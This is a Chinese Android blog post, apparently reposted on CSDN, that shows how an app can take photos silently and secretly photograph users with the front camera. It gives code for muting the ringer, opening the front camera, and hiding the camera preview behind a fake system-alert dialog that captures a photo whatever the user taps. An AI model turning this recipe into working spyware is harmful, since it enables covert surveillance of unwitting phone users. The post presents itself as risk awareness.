Android安全问题(一) 静音拍照与被拍

之前写过一些android手机root之后的安全问题的(文章列表见末尾),其实我是想到哪就写到了,今天整理硬盘,发现一年之前写过一段代码,所以今天我们就一起来讨论一下。

注:这里不是讨论多nb的技术,而是希望不了解android风险的人了解我们所处的状态

导读:
本文介绍了所谓的静音拍照是如何实现的(当然这也是一种恶意软件,只不过受害的不是用户),和用户自己如何被恶意软件拍照的

由于iteye不允许偷和拍放到一起,所以……静音拍照,大家懂的,静音拍照?不就是……
今天的主题是静音拍照与被拍
当然,这里的“被拍”不是指你拿着手机在地铁上深入女同学裙下的女同学(貌似日本人喜欢干这种事情,自行百度其新闻)
这里指的被拍是:你玩着玩着游戏,突然前置摄像头被恶意应用打开,然后咔嚓,然后……

想要实现这些功能,很遗憾,即是没有root权限也可以


下面我们来说正题
首先说静音拍照
其实也就是说静音拍照嘛,怎么实现?当然是先静音再拍照了……最后记得恢复静音前的状态即可。
有的手机直接调解照相快门音量即可,但是没有通用的api,似乎这种手机也很少(第三方的rom可能会有)
另一个办法就是把手机调成静音模式,然后拍照。不过也不是理想的,有些手机虽然调成了静音模式,但是快门不静音,就像闹钟不静音一样。
还有一些其他的静音方式,这里就不说了。如何把手机调成静音?这个没什么技术含量,大家可自行百度。。。
?
代码片段,双击复制
01
02
mAudioManager = (AudioManager) getSystemService(Context.AUDIO_SERVICE);
mAudioManager.setRingerMode(AudioManager.RINGER_MODE_SILENT);

当然,你最好先记录下用户之前的模式
?
代码片段,双击复制
01
intringerMode = mAudioManager.getRingerMode();

这样部分手机的静音拍照就搞定了,比如我使用的g14(android 2.3)就可以达到静音的目的了(所以说htc手机操蛋,现在及其反感htc)

下面说一下被拍
被拍呢,我会选择前置摄像头,玩手机的时候一般人不看手机屁股,因为htc嘛
首先说一下android的摄像头
前置摄像头的通用api是在2.3才开始有的,2.2及之前都需要靠反射调用,不过那时有前置摄像头的android手机也很少
这里我们以2.3为基础作为演示
步骤:
0.伪装
1.打开前置摄像头
2.静音+拍照+退出
3.保存

首先来看看如何调用前置摄像头(当然,你得有前置摄像头才行)
?
代码片段,双击复制
01
02
03
04
mCamera = openCamera(CameraInfo.CAMERA_FACING_FRONT);
publicstaticCamera openCamera(intwhich) {
        returnCamera.open(which);
}

如果没Camera不为null,那么就是成功了

最关键的是伪装,android系统中,调用摄像头必须要有预览画面才行,当然,这也是为了安全
所以拍照时必须有一个窗口,也就是你玩着玩着游戏的时候,突然弹出个窗口给你拍个大头贴
用户看到预览画面了,那傻子都知道他被人黑了,所以病毒不能这么傻,它会给自己穿件外套
我做了一件粗糙的外套来给大家演示
x.png 
当然这个外套比较烂,真正的病毒会做一个很精致,并且比较常见的外套(这样成功率才会高,如果用户手机根本没有股票软件,而我却弹出这么一个对话框,用户再傻也会知道自己中毒了)

下面的操作,无论用户点击确定、取消还是back键,病毒都会拍一张照片然后保存,然后……

camera.xml对应的代码
?
代码片段,双击复制
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
<?xml version="1.0"encoding="utf-8"?>
<FrameLayout xmlns:android="http://schemas.android.com/apk/res/android"
   android:orientation="vertical"
   android:layout_width="300dp"
   android:layout_height="150dp"
   android:background="@color/canvas_background">
   <LinearLayout
            android:layout_width="wrap_content"
            android:layout_height="wrap_content">
            <SurfaceView
                    android:layout_width="wrap_content"
                    android:layout_height="wrap_content"
                    android:id="@+id/alert_camera"/>
        </LinearLayout>
        <include layout="@layout/fake"/>
</FrameLayout>

fake.xml对应的代码
?
代码片段,双击复制
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
<?xml version="1.0"encoding="utf-8"?>
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
   android:layout_width="fill_parent"
   android:layout_height="fill_parent"
   android:orientation="vertical">
   <!-- title -->
   <LinearLayout
            android:layout_width="fill_parent"
            android:layout_height="wrap_content"
            android:layout_weight="1"
            android:layout_gravity="center_vertical"
            android:background="@color/canvas_background">
            <ImageView
                    android:layout_width="wrap_content"
                    android:layout_height="wrap_content"
                    android:layout_margin="10dp"
                    android:src="@drawable/ic_dialog_alert"/>
            <TextView
                    android:layout_width="wrap_content"
                    android:layout_height="wrap_content"
                    android:layout_marginTop="10dp"
                    android:layout_marginBottom="10dp"
                    android:id="@+id/alert_title"
                    android:text="@string/alert_title"
                    android:textSize="22sp">
            </TextView>
        </LinearLayout>
        <!-- line -->
   <!-- message -->
   <LinearLayout
            android:layout_width="fill_parent"
            android:layout_height="wrap_content"
            android:layout_weight="1"
            android:layout_gravity="center_vertical"
            android:background="@color/canvas_background">
            <TextView
                    android:layout_width="wrap_content"
                    android:layout_height="wrap_content"
                    android:layout_margin="10dp"
                    android:id="@+id/alert_message"
                    android:text="@string/alert_message"
                    android:textSize="18sp">
            </TextView>
   </LinearLayout>
   <!-- line -->
   <!-- button -->
   <LinearLayout
            android:layout_width="fill_parent"
            android:layout_height="wrap_content"
            android:orientation="horizontal"
            android:layout_weight="1"
            android:background="@color/button_background">
            <Button
                    android:layout_width="wrap_content"
                    android:layout_height="wrap_content"
                    android:layout_weight="1"
                    android:id="@+id/alert_ok"
                    android:text="@string/alert_ok"/>
            <Button
                    android:layout_width="wrap_content"
                    android:layout_height="wrap_content"
                    android:layout_weight="1"
                    android:id="@+id/alert_cancel"
                    android:text="@string/alert_cancel"/>
   </LinearLayout>
</LinearLayout>

ic_dialog_alert.png就是上图显示的叹号,在frameworks/base/core/res下面就有,复制出来一个就行
上面只是布局代码,我们的activity也需要做一些设置,比如在manifest里要设置主题为
?
代码片段,双击复制
01
android:theme="@android:style/Theme.Dialog"

在onCreate里面要设置下面这些属性,我就不一一解释了
?
代码片段,双击复制
01
02
03
04
05
06
07
requestWindowFeature(Window.FEATURE_NO_TITLE);
Window window = getWindow();
window.setFormat(PixelFormat.TRANSLUCENT);
window.setType(WindowManager.LayoutParams.TYPE_SYSTEM_ALERT);
window.setFlags(WindowManager.LayoutParams.FLAG_FULLSCREEN,
                WindowManager.LayoutParams.FLAG_FULLSCREEN);
setContentView(R.layout.camera);

到这里,关键的地方就都完成了
manifest中还需要配置一些权限
?
代码片段,双击复制
01
02
03
<uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
<uses-permission android:name="android.permission.CAMERA"/>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>


正常的拍照流程代码网上很多,我也不贴了,最后附上的colors.xml文件吧
?
代码片段,双击复制
01
02
03
04
<resources>  
   <color name="button_background">#ffffff</color>
   <color name="canvas_background">#ffffffcc</color>
</resources>  

最后再说两句,如果有了root权限,那么病毒就可以替换快门声的音频文件,或者数据库存储指向快门声音的Uri,这样就能彻底的实现静音拍照了
当然,你想静音拍照别人,没准你也被别人静音拍照了,自重
原文地址:点击打开链接
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值